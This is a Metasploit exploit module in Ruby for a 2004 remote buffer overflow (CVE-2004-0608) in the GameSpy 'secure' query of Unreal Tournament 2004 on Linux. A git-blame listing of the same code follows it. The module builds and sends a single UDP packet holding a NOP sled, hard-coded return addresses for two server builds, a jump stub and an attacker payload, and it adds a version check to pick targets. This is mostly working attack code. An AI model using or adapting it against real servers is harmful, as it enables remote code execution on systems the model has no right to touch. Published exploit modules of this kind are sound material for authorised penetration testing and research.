modules/exploits/linux/games/ut2004_secure.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
      'Description'    => %q{
          This is an exploit for the GameSpy secure query in
        the Unreal Engine.

        This exploit only requires one UDP packet, which can
        be both spoofed and sent to a broadcast address.
        Usually, the GameSpy query server listens on port 7787,
        but you can manually specify the port as well.

        The RunServer.sh script will automatically restart the
        server upon a crash, giving us the ability to
        bruteforce the service and exploit it multiple
        times.
      },
      'Author'         => [ 'onetwo' ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-0608'],
          [ 'OSVDB', '7217'],
          [ 'BID', '10570'],

        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 512,
          'BadChars' => "\x5c\x00",

        },
      'Platform'       => 'linux',
      'Targets'        =>
        [
          ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
          ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
        ],
      'DisclosureDate' => '2004-06-18'))

    register_options(
      [
        Opt::RPORT(7787)
      ])
  end

  def exploit
    connect_udp

    buf = make_nops(1024)
    buf[24, 4] = [target['Rets'][1]].pack('V')
    buf[44, 4] = [target['Rets'][0]].pack('V')
    buf[56, 4] = [target['Rets'][1]].pack('V')
    buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP

    buf[0,  8] = "\\secure\\"
    buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

    udp_sock.put(buf)

    handler
    disconnect_udp
  end

  def ut_version
    connect_udp
    udp_sock.put("\\basic\\")
    res = udp_sock.recvfrom(8192)
    disconnect_udp

    if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
      return m[1]
    end

    return
  end

  def check
    vers = ut_version

    if (not vers)
      vprint_status("Could not detect Unreal Tournament Server")
      return Exploit::CheckCode::Unknown
    end

    print_status("Detected Unreal Tournament Server Version: #{vers}")
    if (vers =~ /^(3120|3186|3204)$/)
      vprint_status("This system appears to be exploitable")
      return Exploit::CheckCode::Appears
    end


    if (vers =~ /^(2...)$/)
      vprint_status("This system appears to be running UT2003")
      return Exploit::CheckCode::Detected
    end

    vprint_status("This system appears to be patched")
    return Exploit::CheckCode::Safe
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GoodRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Udp`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This is an exploit for the GameSpy secure query in`
			`the Unreal Engine.`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This exploit only requires one UDP packet, which can`
			`be both spoofed and sent to a broadcast address.`
			`Usually, the GameSpy query server listens on port 7787,`
			`but you can manually specify the port as well.`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`The RunServer.sh script will automatically restart the`
			`server upon a crash, giving us the ability to`
			`bruteforce the service and exploit it multiple`
			`times.`
New modules, module renames 2005-12-26 14:34:22 +00:00			`},`
			`'Author' => [ 'onetwo' ],`
BSD license the default for non-msfdev created modules. 2006-05-06 16:34:39 +00:00			`'License' => BSD_LICENSE,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'References' =>`
			`[`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`[ 'CVE', '2004-0608'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '7217'],`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[ 'BID', '10570'],`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 512,`
			`'BadChars' => "\x5c\x00",`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`},`
			`'Platform' => 'linux',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[`
			`['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer`
			`['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2004-06-18'))`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(7787)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def exploit`
			`connect_udp`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`buf = make_nops(1024)`
			`buf[24, 4] = [target['Rets'][1]].pack('V')`
			`buf[44, 4] = [target['Rets'][0]].pack('V')`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`buf[56, 4] = [target['Rets'][1]].pack('V')`
New modules, module renames 2005-12-26 14:34:22 +00:00			`buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`buf[0, 8] = "\\secure\\"`
			`buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`udp_sock.put(buf)`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`handler`
			`disconnect_udp`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def ut_version`
			`connect_udp`
			`udp_sock.put("\\basic\\")`
			`res = udp_sock.recvfrom(8192)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`disconnect_udp`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))`
			`return m[1]`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def check`
			`vers = ut_version`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`if (not vers)`
Progress 2014-01-22 11:20:10 -06:00			`vprint_status("Could not detect Unreal Tournament Server")`
			`return Exploit::CheckCode::Unknown`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`print_status("Detected Unreal Tournament Server Version: #{vers}")`
			`if (vers =~ /^(3120\|3186\|3204)$/)`
Progress 2014-01-22 11:20:10 -06:00			`vprint_status("This system appears to be exploitable")`
New modules, module renames 2005-12-26 14:34:22 +00:00			`return Exploit::CheckCode::Appears`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00

New modules, module renames 2005-12-26 14:34:22 +00:00			`if (vers =~ /^(2...)$/)`
Progress 2014-01-22 11:20:10 -06:00			`vprint_status("This system appears to be running UT2003")`
New modules, module renames 2005-12-26 14:34:22 +00:00			`return Exploit::CheckCode::Detected`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Progress 2014-01-22 11:20:10 -06:00			`vprint_status("This system appears to be patched")`
New modules, module renames 2005-12-26 14:34:22 +00:00			`return Exploit::CheckCode::Safe`
			`end`
Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules 2009-07-27 14:05:23 +00:00			`end`